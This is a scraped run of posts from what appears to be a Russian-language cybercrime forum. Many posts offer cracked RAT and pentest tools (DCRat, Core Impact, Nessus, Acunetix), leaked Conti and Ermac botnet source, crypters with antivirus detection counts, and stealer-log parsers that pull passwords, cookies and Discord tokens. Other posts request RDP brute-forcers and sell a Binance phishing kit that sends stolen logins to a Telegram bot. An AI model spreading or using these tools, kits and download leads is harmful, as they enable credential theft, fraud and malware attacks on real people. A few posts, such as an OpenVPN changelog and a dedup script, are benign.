Здравствуйте, у меня есть доступ к rdp винды,юзерка,возник вопрос можно ли послать серверу через командую строку(т.е. логинясь как в mstsc только без интерфейса) bat скрипт,по типу taskkill /im 1.exe & run "D:\1.exe"?Подскажите пожалуйста программы которые можно применить в этой ситуации. Буду очень благодарен!
Приветствую, нужен чекер wp на валид
формат лога линк:логин:пароль
Платный или бесплатный. Спасибо
Рабочая версия
Репак, многие искали, минимум шлака
линк
https://send.exploit.in/download/bc6efd71e9343270/#qES9S4JokhtxdwY5wYmzNw
пасс xss
пасс от архива rsload (менять не стал, в поддержку ребят)
Актуальный кряк DCRAT от RENGINEERINGLAB
Ссыль для скачки
Hidden content for authorized users.
ТЫЦ
password-to-unlock:xss
Note for you:Ссыль доступа 7 дней на 100 скачек
Description from REENGINEERINGLAB:
**Установка проста, нужно добавить install.php на сервере и открыть, сохранить
сгенерированный URL и ваш пароль.
Далее запустите 123.bat и после запуска вставьте его сгенерированным URL и
вашим паролем.
DISC:
Запускайте на VM'ке я незнаю есть ли там клипы я всего-лишь проверил
работоспособость кряка, сами авторы кряка заверяют что нет такого поведения
которые они заметили.
Но лучше перестраховаться и проверить на VM.**
Очень удобная и простая программа для фильтрализации базы
Hidden content for authorized users.
https://www.sendspace.com/file/ypkkvv
(c)Lays
Conti Kaynak Kodu Sürüm 3
Dosyayı indir conti
dosya.co
Şifre - ВсеБудеУкраїна
](https://www.virustotal.com/gui/file/0737ebb6ede108d90216bc06ccfce57defa2179bfda93a34edd868a6f9172a78)
VirusTotal
www.virustotal.com
Code:Copy to clipboard
127.0.0.1 erp.acunetix.com
127.0.0.1 erp.acunetix.com.
127.0.0.1 updates.acunetix.com
127.0.0.1 updates.acunetix.com.
1.1.1.1 telemetry.invicti.com
1.1.1.1 telemetry.invicti.com.
127.0.0.1 data.pendo.io
127.0.0.1 cdn.pendo.io
127.0.0.1 pendo.io
127.0.0.1 api.segment.io
::1 erp.acunetix.com
::1 erp.acunetix.com.
::1 updates.acunetix.com
::1 updates.acunetix.com.
2606:4700:4700::1111 telemetry.invicti.com
2606:4700:4700::1111 telemetry.invicti.com.
Fantastic tool to do passive scan in ICS environment: https://github.com/nsacyber/GRASSMARLIN
Ушла с темы,лежит 4 комплекта брут
2 комплетка порт сканер без дела.
--------
Деньги особо не в приоритете но от 500$ за все не откажусь .
Пишите в личку контакты сделаем привязку
Полный фарш для полноценного брута
+Бонус неделя консультаций от меня по бруту с 0 От А до Я
опыт 4 года
Есть стиллер который отправляет логи в телеграмм.
Есть панель от старого стиллера на с++
Нужно эту панель прицепить к стиллеру, бюджет не ограничен.
Предложения в пм, гарант.
Download:
Hidden content for authorized users.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/Suh3WLyI#UmCH4c4alW_nuox5ntqoHmUrQoZuBa200HwcT7g-t2I)
mega.nz
Здарова всем, у меня возник вопрос, можно ли запустить бд Кронос на андроид, или через что на андроид адаптировать бд в xlss файлы
Run file "SNIPR Cracked" NOT "SNIPR". If it asks for username/password use any
Hidden content for authorized users.
Приветствую! Я публикую утечку nessus pro для всех вас.
](https://anonfiles.com/X8AbJd10ub/Nessus_pro_zip)
anonfiles.com
Сабж. Кто-нибудь юзал их софт, расскажите что из себя представлят, стоит ли своих денег?
Windows 10 32/64bit Orjinal Key
Google search not found
You must have at least 15 reaction(s) to view the content.
Куплю крякнутую версию по разумной цену. ( Z668 rdp brute)
Reco имеется.
Телеграм @Onyx3d
Написан на Python. Не судите строго! Писал для своих нужд, чтоб по-быстрому
отфильтровать спарсенную инфу.
Когда софт запрашивает путь к исходному файлу (не обязательно с юзернеймами)
писать ничего не нужно, просто берёте и мышкой перетаскиваете txt файл
командную строку.
Потом программа попросить указать название выходного файла: пишете что-то типо
output.exe
Программа всё обрабатывает, выдаёт результат и даже создаст файл report.txt с
отчётом.
Ниже привожу официальное описание своего софта:
Uniqify — это простой и эффективный инструмент для удаления дубликатов из текстовых файлов, который помогает поддерживать ваши списки в идеальном порядке. Разработанный с акцентом на удобство и надежность, Uniqify позволяет легко управлять и очищать данные, не тратя время на ручные операции.
Uniqify — это ваш надежный помощник в управлении списками и данных, позволяющий упростить и ускорить процесс очистки от дубликатов. Не теряйте время на рутинные задачи — доверяйте их Uniqify!
Code:Copy to clipboard
def remove_duplicates(input_file, output_file, report_file):
import chardet
def detect_encoding(file_path):
with open(file_path, 'rb') as file:
raw_data = file.read(10000) # Читаем часть файла для определения кодировки
result = chardet.detect(raw_data)
return result['encoding']
def read_file_with_encoding(file_path, encoding):
with open(file_path, 'r', encoding=encoding) as file:
return file.readlines()
try:
# Определение кодировки файла
encoding = detect_encoding(input_file)
print(f"Используемая кодировка: {encoding}")
# Чтение списка юзернеймов из файла
try:
usernames = read_file_with_encoding(input_file, encoding)
except UnicodeDecodeError:
print(f"Ошибка: не удалось прочитать файл с кодировкой {encoding}. Попробуем latin1.")
usernames = read_file_with_encoding(input_file, 'latin1')
encoding = 'latin1'
# Удаление пробелов и дубликатов
cleaned_usernames = [username.strip() for username in usernames]
unique_usernames = list(set(cleaned_usernames))
# Запись уникальных юзернеймов в новый файл
with open(output_file, 'w', encoding='utf-8') as file:
for username in unique_usernames:
file.write(f"{username}\n")
# Создание отчёта
with open(report_file, 'w', encoding='utf-8') as report:
report.write(f"Обработан файл: {input_file}\n")
report.write(f"Изначальное количество юзернеймов: {len(usernames)}\n")
report.write(f"Уникальных юзернеймов: {len(unique_usernames)}\n")
report.write(f"Файл с уникальными юзернеймами сохранён как: {output_file}\n")
print(f"Операция завершена успешно. Отчёт сохранён как {report_file}")
except FileNotFoundError:
print(f"Ошибка: файл {input_file} не найден.")
except Exception as e:
print(f"Произошла ошибка: {e}")
if __name__ == "__main__":
import os
# Запрашиваем путь к начальному файлу и название выходного файла
input_file = input("Введите путь к начальному файлу с юзернеймами: ").strip()
output_file = input("Введите название выходного файла с уникальными юзернеймами: ").strip()
report_file = "report.txt" # Можно оставить фиксированное название для отчёта
if not os.path.isfile(input_file):
print(f"Ошибка: файл {input_file} не существует.")
else:
remove_duplicates(input_file, output_file, report_file)
Скачать UniqiFY: https://mega.nz/file/9oQgHYCB#LJZdU4YF5XSmrpTv5a_LEfwNaAy3FCpdOqycguJywXo
P.S:
Сегодня добавлю формат .exe
Протестировано с файлом, в котром список 170к юзернеймов
Работает с файлами до 1 gB
Отчёт выглядит вот так:
Изначальное количество юзернеймов: 172210
Уникальных юзернеймов: 13167
Файл с уникальными юзернеймами сохранён как: output.txt
Не обязательно это должны быть юзернеймы, любой список любых слов чиститься от дублей
Need reliable site or spammer to get bank logs
https://anonfiles.com/9bKch7y4p7/Crypter_rar
https://anonfiles.com/L7I3h0ybp9/xencrypt_rar
Криптор сценариев PowerShell.
Детект 2/59
https://anonfiles.com/r9beify5p9/Run_pe_cryptor_frame-master_zip
Файлы для криптора. Версия x86
Всем привет друзья .
В наличии есть пару чекеров вордпресс бесплатный и платный ,но оба не нравятся
по разным причинам -бесплатный пропускает много ,платный медленный и много
попадает в error потм перечекивать приходится .Если кто юзает сейчас
конкретный чекер для вордпресс ,посоветуйте пожалуйста .
Так же нужен инструмент заливающий контент на админ права (можно и не только
админ права -если такой есть ) Понимаю что бывают разные ,кто то через sql,кто
то через rest api или xmlrpc
Буду рад и совету и конкретной информации
Предисловие.
Рад приветствовать всех читающих. Данная статья - следствие моего знакомства с Linux. Моя основная система Parrot Security OS и благодаря ей я пришел к знакомству с Termux, приложением, от которого просто невозможно отказаться. Данная статья ориентируется на новичков, только начинающих знакомство с консолью на android.
Часть 0. Что такое termux.
Termux - android приложение, эмулятор терминала linux, имеющее в основе chroot
среду. По умолчанию termux не требует наличие root на устройстве, но наличие
прав будет преимуществом. Это базовая система с возможностью установки утилит
при помощи apt&pkg и клонирования через -git.
Сказать проще - кто знаком с linux и консолью будут приятно удивлены, ведь это
приложение является настоящей мини-копией оригинального терминала и
возможности практически одинаковы.
Часть 1. Установка и обновление.
Приложение можно скачать с play market. Рекомендую так же установить Hackers
Keyboard. Это дополнит ваши возможности при работе, так-как по умолчанию
termux предусматривает наличие только некоторых клавиш, а именно :
ESC,TAB,CTRL,ALT. Тут уже на вкус и цвет, например я не использую клавиатуру
Hackers, но упомянуть ее должен.
Скачайте и запустите termux. Отличный день, чтобы его обновить! Введите
поочередно команды:
apt update
apt upgrade
для обновления своего приложения.
Часть 2. Основы работы.
Итак, думаю начнём с обсуждения, как установить утилиту. Termux
предусматривает установку при помощи команды apt / pkg. Давайте посмотрим, как
выглядит команда для установки git:
apt install git
Довольно просто! Установка python выглядит вот так:
apt install python
Думаю суть вы уловили.
"apt - это менеджер работы с пакетами"
Итак, мы разобрались, как устанавливаются пакеты. Чаще всего, если вы
подбираете для себя какой-либо инструмент под termux, в описании обязательно
есть инструкция и команды для установки. Вам лишь достаточно понимать, как это
работает, чтобы чтение инструкций и команд по установке не вызывало у вас
трудности.
Termux предлагает возможность работы в нескольких сессиях одновременно. Для
этого достаточно свайпа вправо, вам станет доступны к просмотру активные
сессии а так-же возможность создать новую сессию.
Мобильная работа будет немного сложна в начале, для того чтобы очистить рабочее пространство от логов прошлых команд, используйте "clear" для очистки истории, либо вы можете нажать CTRL + L, чтобы консоль убрала вверх всю историю действий, оставив для вас чистое окно. Но в данном варианте у вас есть возможность подняться вверх и посмотреть результаты прошлых команд.
Обратите внимание, что приложение довольно понятно и если происходят ошибки, то вы получите подсказку, чего не хватает системе. К примеру, вы можете получить ошибку при запуске скрипта, если у вас отсутствует python. Тогда termux предложит вам команду по установке python.
Часть 3. Почему termux?
Конечно же, мобильность. Так ли удобно иметь при себе ноутбук? А если вы
решили посканировать сети, например, в посольстве или банке, легка ли задача
при условии, что у вас ноутбук? Конечно, termux не способен заменить вам вашу
linux систему на ПК, но это большой помощник в "полевых" условиях. Нельзя
сказать, что его возможности безграничны. Но владея тем-же python, вы можете
создавать свои собственные инструменты для работы и успешно пользоваться ими.
Часть 4. Примеры популярных инструментов.
Ngrok - кросс-платформенный софт для создания защищенных сетевых туннелей от общедоступной конечной точки до локально работающей сетевой службы. Также утилита собирает весь трафик и логирует его для анализа.
Sqlmap - инструмент для тестирования на проникновение с открытым исходным кодом, который автоматизирует обнаружение и использование недостатков SQL- инъекций и захват серверов баз данных.
Nmap — утилита, предназначенная для сканирования сетей. Может находить открытые порты, делать трассировку, проверять на уязвимости с помощью NSE- скриптинга.
Weevely - генератор shell.
CMSmap - сканер уязвимостей движков сайтов.
AdminFinder - поиск админки сайта, лист на 2.000 позиций.
Antifish - сканер фишинговых сайтов. Ворует то, что уже украдено.
RED_HAWK - сильный сканер сайтов.
h8mail - сканирует почты на предмет слива паролей.
Думаю, что этого достаточно, чтобы немного прояснить, какой именно софт создаётся и работает на termux. Благодарю за прочтение. Если уважаемым старожилам есть что добавить/поправить, то буду сердечно благодарен!
All Mail Checker 2.1.0.1
You must have at least 5 reaction(s) to view the content.
Virus Total: https://www.virustotal.com/gui/file...77340dc2ce82451618ba48984e66f7c5808/detection
Собирайте любые контакты с любых сайтов: почтовые электронные адреса, телефонные номера, интернет-мессенджеры и др. Программа определит категорию и регион сайтов, с которых собраны контакты. Сохранение результатов сбора e-mail адресов и других контактов осуществляется в таблицу Excel (.csv файл).
Возможности Софта:
Преимущества StandartHarvester:
Немного о времени, так сказать
Всем форумчанам приятного вечера! Надеюсь полезно ?
ВИДЕО ПО АКТИВАЦИИ:https://radikal.ru/video/4h3E4LZEdfV
You must have at least 120 reaction(s) to view the content.
Подробное описание https://www.rapid7.com
инструкция к кряку в info txt
You must have at least 25 message(s) to view the content.
NinjaGram - Instagram бот №1 в мире. Это универсальное маркетинговое программное обеспечение которое помогает обрабатывать всю информацию Instagram в автоматическом режиме, сохранит вам большое количество времени, дает вам тысячи фолловеров и помогает вам получать больше прибыли от этого невероятно популярного сайта обмена изображениями!
Офф. сайт: http://ninjapinner.com/ninjagram-instagram- bot-2/
Pre-Cracked & RePacked by yaschir
Особенности
- Делать список заданий с помощью поиска фото/юзеров по тэгам, кейвордам,
фоловверам юзера, друзьям юзера, новостей, ссылок и т.п.
- Авто подписка
- Авто отписка (из которой можно исключить пользователей, на которых вы
подписали Х дней назад).
- Авто лайкинг (лайкинг новых фото по тэгу, лайкинг всех фото по тэгу, и
т.п.).
- Суперлайкинг! Поставить лайк 5 последним фото всем пользователям из списка
- Автокомментинг по комментариям из файла.
- Поставить лайк последней фото пользователя, когда подписываемся на него.
- Установка задержек.
- Черный список
- Поддержка прокси.
- Импорт - экспорт аккаунтов из текстового файла.
- И многое другое ...
You must have at least 20 message(s) to view the content.
Download: https://ponies.cloud/exploitation/Core-Impact-21.5-Pwn3rzs.7z
Password: Pwn3rzs
source
Всем доброго времени суток, кто-нибудь мог бы поделиться чистым и рабочим
кряком на Netsparker под винду или тыкнуть в тред на форуме, где уже
выкладывали?
Заранее благодарю.
Чистая разметка без какой либо грязи.
Доставка Username/Password/Ip в телеграм бота.
Легкая админ-панель для правок исходного кода прямо с сайта
Вид лога:
----------------------------------
Username: test@mail.com
Password: 45645646
IP: 127.0.0.1
----------------------------------Click to expand...
Скриншоты тут -> https://xss.is/threads/102036/
Токен и чат-айди указать в файле POST.php
dwnl:
You must have at least 20 message(s) to view the content.
Для желающих отблагодарить копейкой: bc1qykwnd4fcadz6fx79csy29vdnlcfjhfxhnfms86 (бтц)
После почти четырёх лет с момента публикации ветки 2.4 подготовлен релиз OpenVPN 2.5.0, пакета для создания виртуальных частных сетей, позволяющего организовать шифрованное соединение между двумя клиентскими машинами или обеспечить работу централизованного VPN-сервера для одновременной работы нескольких клиентов. Код OpenVPN распространяется под лицензией GPLv2, готовые бинарные пакеты формируются для Debian, Ubuntu, CentOS, RHEL и Windows.
Основные новшества:
• Поддержка шифрования канала передачи данных с использованием потокового шифра ChaCha20 и алгоритма аутентификации сообщений (MAC) Poly1305, разработанных Дэниелом Бернштейном (Daniel J. Bernstein), Таней Ланге (Tanja Lange) и Питером Швабе (Peter Schwabe). ChaCha20 и Poly1305 позиционируются как более быстрые и безопасные аналоги AES-256-CTR и HMAC, программная реализация которых позволяет добиться фиксированного времени выполнения без задействования специальной аппаратной поддержки. ChaCha20 и Poly1305 также применяются в VPN WireGuard.
• Возможность предоставления каждому клиенту своего уникального ключа tls- crypt, что позволяет крупным организациям и VPN-провайдерам применять такие же методы защиты стека TLS и предотвращения DoS-атак, которые ранее были доступны в небольших конфигурациях, использующих tls-auth или tls-crypt. Режим активируется при помощи опции "--tls-crypt-v2".
• Улучшен механизм согласования шифра, применяемого для защиты канала передачи данных. Опция ncp-ciphers переименована в data-ciphers для того, чтобы избежать неоднозначности при наличии опции tls-cipher, и подчеркнуть, что data-ciphers является предпочтительным для настройки шифров канала данных (поддержка старого названия сохранена для обеспечения совместимости). Клиенты теперь передают на сервер список всех поддерживаемых ими шифров из набора data-ciphers, используя переменную IV_CIPHERS, что позволяет серверу выбрать первый поддерживаемый обеими сторонами шифр. Указанное изменение, например, позволяет указать в data-ciphers набор ChaCha20-Poly1305:AES-256-GCM, но использовать ChaCha20-Poly1305 только если клиент его поддерживает.
• Поддержка TLS 1.3. Для использования TLS 1.3 требуется как минимум OpenSSL 1.1.1. Для тонкой настройки параметров TLS добавлены опции "--tls- ciphersuites" и "--tls-groups".
• Из конфигурации по умолчанию убрана поддержка шифра BF-CBC. В OpenVPN 2.5 по умолчанию теперь принимаются только шифры AES-256-GCM и AES-128-GCM. Изменить данное поведение можно при помощи опции data-ciphers, напрмер, указав в настройках "data-ciphers AES-256-GCM:AES-128-GCM:BF-CBC", а для поддержки очень старых узлов, не поддерживающих согласование шифров (режим "--cipher"), можно указать "data-ciphers-fallback BF-CBC". При обновлении до новой версии OpenVPN настройка "cipher BF-CBC" в старых файлах конфигурации будет преобразована в добавление BF-CBC к набору data-ciphers и включён режим data- ciphers-fallback.
• В плагин auth-pam добавлена поддержка асинхронной (отложенной) аутентификации. Аналогично в опцию "--client-connect" и API для подключения плагинов добавлена возможность отложенного возвращения файла конфигурации.
• Ускорен процесс установки соединения - клиент теперь может указать переменную IV_PROTO в pull-режиме, после чего сервер передаст клиенту конфигурацию, не дожидаясь сообщения PULL_REQUEST.
• Поддержка настройки IP-адресов и маршрутов при помощи интерфейса Netlink, предоставляемого ядром Linux. Netlink применяется при сборке без опции "--enable-iproute2" и позволяет запускать OpenVPN без дополнительных привилегий, необходимых для выполнения утилиты "ip". Поддержка запуска утилит ifconfig и route прекращена.
• В протокол добавлена возможность применения двухфакторной аутентификации или дополнительной аутентификации через Web (SAML), без разрыва сеанса после первой проверки (после первой проверки сеанс остаётся в состоянии "не аутентифицирован" и ожидает завершения второй стадии аутентификации).
• Поддержка тегированных VLAN (802.1q) при работе сервера в режиме TAP, позволяющая разделять клиентов по группам и применять к этим группам разные настройки (выносить в разные подсети, использовать свои правила пакетного фильтра и т.п.). Настройка производится при помощи опций "--vlan-tagging", "--vlan-accept" и "--vlan-pvid".
• Для Windows добавлена поддержка интерфейса wintun, который быстрее, чем традиционные интерфейсы tap9 tun/tap, но не поддерживает режим "--dev tap". Для включения следует использовать опцию "--windows-driver wintun". Обеспечено корректное определение Windows 10. Добавлена поддержка создания установочных файлов на базе msi.
• Появилась возможность работы при наличии только адресов IPv6 внутри VPN- туннеля (ранее было не обойтись без указания адресов IPv4).
• В Linux добавлена поддержка сетевых интерфейсов виртуальной маршрутизации и перенаправления (VRF, Virtual routing and forwarding). Для помещения внешнего сокета в VRF предложена опция "--bind-dev".
• Поддержка передачи через DHCP базового домена для маски "dns search" в resolv.conf, прикрепляемой по умолчанию при операциях поиска по имени в DNS. В Windows домен задаётся при помощи опции "--dhcp-option DOMAIN-SEARCH my.example.com", в Linux через "--up script", а в macOS через GUI.
• Возможность привязки отдельных настроек data-ciphers и data-ciphers-fallback к клиентам из скрипта client-connect.
• Возможность указания размера MTU для интерфейса tun/tap в Windows.
• Поддержка выбора движка OpenSSL для доступа к закрытому ключу (например, TPM).
• В опции "--auth-gen-token" появилась поддержка генерации токена на базе HMAC.
• Возможность использования сетевых масок /31 в настройках IPv4 (OpenVPN больше не пытается настроить широковещательный адрес).
• Добавлена опция "--block-ipv6" для блокирования любых пакетов IPv6.
• В опциях "--ifconfig-ipv6" и "--ifconfig-ipv6-push" разрешено указание имени хоста вместо IP-адреса (адрес будет определён через DNS).
• Объявлены устаревшими или удалены: ncp-disable, вызов через inetd, no-iv, "--client-cert-not-required", "--ifconfig-pool-linear", "--compress xxx", "--disable-multi", "--key-method 1". Прекращена поддержка сборки с OpenSSL 1.0.1. Запрещена сборка без поддержки шифрования (сборочная опция "--disable- crypto" больше не работает, но сохранён режим "--cipher none"). Применение сжатия пакетов признано рискованным из-за возможности совершения атаки VORACLE по восстановлению содержимого.
• Source: https://github.com/OpenVPN/openvpn/releases/tag/v2.5.0
• Source: https://github.com/OpenVPN/openvpn/blob/master/Changes.rst
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FS5Z5xTg%2Fx-Ray-Web- Vulnerability-Scanner-Advanced.jpg&hash=50871f61a302cddbf94551fcd1dd5099)
Расширенный сканер уязвимостей xRay Web Полная активация
Отсутствие ложных срабатываний без ущерба для бизнеса
Каждая лазейка подверглась реальным экспериментальным исследованиям с использованием усовершенствованного семантического анализа + инновационной технологии обнаружения, чтобы гарантировать, что лазейка является реальной и эффективной, во избежание массовых искажений, влияющих на бизнес-суждение, и для экономии ресурсов безопасности。
Сообщество Xray - это бесплатная платформа инструментов для белых шляп,
запущенная Nagaki Technology. В настоящее время в сообществе есть
рентгеновский сканер лазейки Radium reptile
Инструменты были созданы многими опытными разработчиками безопасности и
десятками тысяч участников сообщества.
Множество удивительных функций в одном
Обнаружение распространенных веб-уязвимостей
Встроенные 10+ общих модулей обнаружения веб-уязвимостей, поддерживающие точное обнаружение распространенных уязвимостей, таких как SQL-инъекция, XSS, выполнение команд, включение файлов и т. Д.
200+ POC
Более 200 встроенных высококачественных POC, представленных сообществом,
охватывающих веб-уязвимости с высоким риском за последние три года реальных
боевых действий, и все они бесплатны для использования.
Специальные возможности тестирования
Расширенная версия поддерживает обнаружение исторических уязвимостей с высоким
риском в таких фреймворках, как struts, fastjson, thinkphp, Shiro и т. Д.,
Одним щелчком мыши.
Алгоритм обнаружения NG
Интеллектуальное обнаружение - это не пустая болтовня, основанная на
многолетнем опыте экспертов по безопасности в нападении и защите и выражении
его с помощью уникального и эффективного метода обнаружения.
Поддержка глубокой настройки
Многие элементы конфигурации открываются в файле конфигурации, и возможности
движка можно значительно настроить, настроив соответствующие параметры.
Метод сканирования из нескольких источников
Поддержка пассивного прокси, базового сканера, поискового робота, одного URL и
других источников ввода не обязательна, и вы можете использовать прокси для
расширения самостоятельно.
Поисковый робот
Сканер rad может динамически отображать веб-сайты с различными фреймворками и
запрашивать обходы, не упуская «скрытые углы», в которых существуют лазейки.
Высокоинтерактивный доступ к странице
При моделировании поведения человека при щелчке, вводе и других операциях,
интеллектуальная остановка, возврат, продолжение щелчка и другие операции.
Постоянные итеративные обновления
Важные проблемы быстро исправляются, а серьезные уязвимости продолжают
добавляться для поддержания жизнеспособности
Вы можете использовать расширенный сканер уязвимостей xRay Web с Acunetix Premium
Activated -WwW.Dr-FarFar.CoM.zip**
hello,
since I've been doing some research on the forum and there is no thread where to share forums or/and telegram channels where Breached Databases are shared.
I start with the list I compiled of open forums where you can get leaked databases.
Здравствуйте,
Поскольку я проводил исследование на форуме и не нашел темы, где можно было бы поделиться форумами или/и телеграм-каналами, где выкладываются взломанные базы данных.
Начну с составленного мной списка открытых форумов, где можно получить утечку баз данных.
To create a thread similar to Ransomware groups leak sites -> threads/35828/
Forums:
Telegram Channels:
_Давайте попробуем собрать все это в одном месте, помогите!
Feel free to correct if something is not right and comment by adding new forums and/or telegram channels.
Thanks in advance_
dw (pass - t.me/rawret (линк и есть паролем)):
https://mega.nz/file/KGRhnDYT#pdCLDFvb6OqIuFncYpxN2WHcGPlkoGO7SWwg4XmNNKo
vt (g29ehg29g2g892e98g289.exe):
https://www.virustotal.com/gui/file...3680aed8b4ef467ac66e0760f474c6e40de/detection
Сделал фиш бинанса для логирования Logpass в Telegram. Детекта на фишинг от
хрома быть не должно т.к. верстку делал с нуля, это не выкачанная копия.
Чтоб использовать фиш поменяйте chatId и botToken на свои (936 и 937) строчка.
JavaScript:Copy to clipboard
const chatId = 6427757968; // int
const token = ''; //str
Если кто-то захочет, я смогу поставить фиш на свой хостинг, если сами не умеете, но за небольшную плату. Домен настрою и подключу Cloudflare.
Жду критику в комментариях
ребят подскажите как пользоваться кроносом. у меня искажает буквы, невозможно ничего взять с базы
ищу софт для звонков, номера должны быть из одной страны. если не ошибаюсь, в кол центрах используются такие же.
порекомендуйте любой, кроме той, которая даст им постучать в мою дверь на второй день)
заранее спасибо
You must have at least 10 message(s) to view the content.
В поисках софта, который чекает всю возможную крипту, которая есть на тг аккаунте
outoftheworld8 has 3 repositories available. Follow their code on GitHub.
github.com
Hidden content for authorized users.
1.Очистка от логов от мусора.Софт удалит все файлы с расширением .exe , .bat,
.scr, .lnk, .bin,.cmd, .js, .jse, .gadget, .jar, .msi, .wsf, .vbs, .ps1, .app,
.vb, .hta
2.Достать строки из логов в форматах
url:login:pass,login:pass,pass((настраивается в конфиге)).Возможно достать все
строки или же только по указанным вами запросам.
3.Достать Discord.Достать все токены дискорда.
4. Достать куки из логов .Возможно достать все строки или же только по
указанным вами запросам.
5. Достать Discord.Достать все файлы tdata.
Исходный код
Hidden content for authorized users.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/CuZjyCDB#3MpJ6Hs8qZEeNqOP4DeLeyoFda1TmvXRkAGNksKE5nM)
mega.nz
Версия скомпилированная nuitka
Hidden content for authorized users.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/WnwyHQqZ#E5xkwUhJwDnQhkL_DAmZwt0bwPG74WhItiGssxnghJE)
mega.nz
Жду предложений и репортов по багам.
Асинхронная работа чекера
Не требует прокси, работает нон стоп чекая 100 000+ адресов ежедневно.
При прохождении всех кошельков начинает с начала.
Логи при нахождении баланса может отправлять в бота телеграм:
You must have at least 10 reaction(s) to view the content.
Приветствую бандиты!!! Столкнулся тут с проблемкой как слить весь канал YOUTUBE. Когда видосов много и шорты есть то можно изумится если сливать по одному.... Короче отличная БЕСПЛАТНАЯ софтинка WINX YOUTUBE DOWNLOADER НЕ РЕКЛАМА. Пользуйтесь и скажите спасибо!
](https://anonfiles.com/bc54Ve51u7/CoreImpact_20.4_-_Decrypted_exe)
anonfiles.com
Парсер 2Gis предназначен для сбора структурированной информации о всех организациях, представленных в онлайн-каталоге 2ГИС. С помощью парсера можно получить следующие данные:
- Названия организаций.
- Почтовые адреса организаций.
- Электронная почта (E-mail) организаций.
- Номера телефонов.
- Адреса сайтов.
- Время работы организаций.
- Координаты зданий.
- Страницы в социальных сетях.
You must have at least 100 reaction(s) to view the content.
О программе:
Хорошая скорость
Парс самых важных данных
Поддержки всех типов прокси HTTP's, SOCKS4, SOCKS5
Можно грузить mail:pass и login:pass
Авто обрезка mail:pass в login:pass
Парс прокси по ссылке каждые 2 минуты
Авто подписка на указанного человека
как пример вид лога:
或者,如果您有这样的帐户,请与我联系。美国网站需要大量帐户。价格是3-5美元
Добрый день форумчане , хотел бы поделиться своим скриптом для фарма монеток в
blum.
Суть очень проста , запустить приложения blum через ПК и запустить сам скрипт
(так же надо прописать 1 ).
q- остановить / запустить
Python:Copy to clipboard
import pygetwindow as gw
import pyautogui
import time
import keyboard
import random
from pynput.mouse import Button, Controller
import threading
mouse = Controller()
time.sleep(0.5)
def click(x, y):
mouse.position = (x, y + random.randint(1, 3))
mouse.press(Button.left)
mouse.release(Button.left)
def find_red_pixels(window_rect):
while True:
if paused:
continue
scrn = pyautogui.screenshot(
region=(window_rect[0], window_rect[1], window_rect[2], window_rect[3]))
width, height = scrn.size
red_pixel_found = False
for x in range(width):
for y in range(height):
r, g, b = scrn.getpixel((x, y))
if (r, g, b) == (252, 118, 132): # Пиксели в указанном диапазоне цвета
click(window_rect[0] + x, window_rect[1] + y)
red_pixel_found = True
break
if red_pixel_found:
break
if red_pixel_found:
print('Обнаружены пиксели красного цвета. Отключение поиска на 26 секунд.')
time.sleep(30)
else:
time.sleep(3)
window_name = input('\n[✅] | Введите название окна (1 - TelegramDesktop): ')
if window_name == '1':
window_name = "TelegramDesktop"
check = gw.getWindowsWithTitle(window_name)
if not check:
print(f"[❌] | Окно - {window_name} не найдено!")
exit()
else:
print(f"[✅] | Окно найдено - {window_name}\n[✅] | Нажмите 'q' для паузы.")
telegram_window = check[0]
paused = False
# Запускаем поток для поиска красных пикселей
thread = threading.Thread(target=find_red_pixels, args=((telegram_window.left, telegram_window.top,
telegram_window.width, telegram_window.height),))
thread.daemon = True
thread.start()
while True:
if keyboard.is_pressed('q'):
paused = not paused
if paused:
print('[✅] | Пауза.')
else:
print('[✅] | Продолжение работы.')
time.sleep(0.2)
if paused:
continue
window_rect = (
telegram_window.left, telegram_window.top, telegram_window.width, telegram_window.height
)
if telegram_window != []:
try:
telegram_window.activate()
except:
telegram_window.minimize()
telegram_window.restore()
scrn = pyautogui.screenshot(
region=(window_rect[0], window_rect[1], window_rect[2], window_rect[3]))
width, height = scrn.size
pixel_found = False
word_found = False
if pixel_found == True:
break
for x in range(0, width, 20):
for y in range(0, height, 20):
r, g, b = scrn.getpixel((x, y))
if (b in range(0, 125)) and (r in range(102, 220)) and (g in range(200, 255)):
screen_x = window_rect[0] + x
screen_y = window_rect[1] + y
click(screen_x + 4, screen_y)
break
print('[✅] | Остановлено.')
Скрипт очень простенький но если будет большое количество актива то возможно сделаю скрипт более автоматизированным
Если возникнут вопросы пишите в тг @q2esmm или в комментариях
А так же если хотите отблагодарить молодого кодера то снизу кош
BTC - bc1qj3r8znsscg2ywjq8kzqxegmzel2uxkd9vnz2f3
ETH - 0xf651a3889d80b6946bF54eF118F6FE554bFC41af
USDT - 0xf651a3889d80b6946bF54eF118F6FE554bFC41af
(Строго не судите это мой первый пост, буду рад если поддержите лайком )
Всё работает. Но. При бруте выдает только логин:пасс, без инфы, сортировка хитс и 2фа, при это в хит даже не вписывает проксю, с которой была успешная авторизация. Сиди гадай, так при входе на аккаунт с браузера выдает 2фа.
Скачать V2
[VT V2](https://href.li/?https://www.virustotal.com/gui/file-
analysis/ZGUxYzJiODlmNTkxOGQ2ZGE5NjQ0ZTFmODA2YWQxMGY6MTYwODEzNjE1NQ==/detection)
Добрый день форумчане! Заинтересовался темой брутом RDP, так вот.
Нужен актуальный и рабочий софт, либо бесплатный, либо платный, а так-же
небольшое консультирование насчет расходов.
Всем удачного дня
Program: https://mega.nz/folder/NNhFmQIA; Decryption key: vIN5WL-DUOrX0Kigim4NQg
Patch: https://www52.zippyshare.com/v/rNMHqCkq/file.html
13.0.200911171.zip, MD5: 1AECC6D23E9324F5678252965099127D
wvsc.exe, MD5: 60C3B819770FF6BFA1925D31DAE3C858
license_info.json, MD5: FA61560041725CE1361F5793363B8772
Replace License:
%ProgramData%\Acunetix\shared\license\license_info.json
Replace wvsc.exe:
Acunetix\13.0.200911171\wvsc.exe
Ermac 3.0 Botnet Source Code Along With Builder Has Been Leaked, If Anyone Asks About This Installation Same As Hookbot Installation, You Can View Source And Understand.
Note:
It is prohibited to resell sources that have been leaked
Panel Builder:
admin
admin0101
Free Download
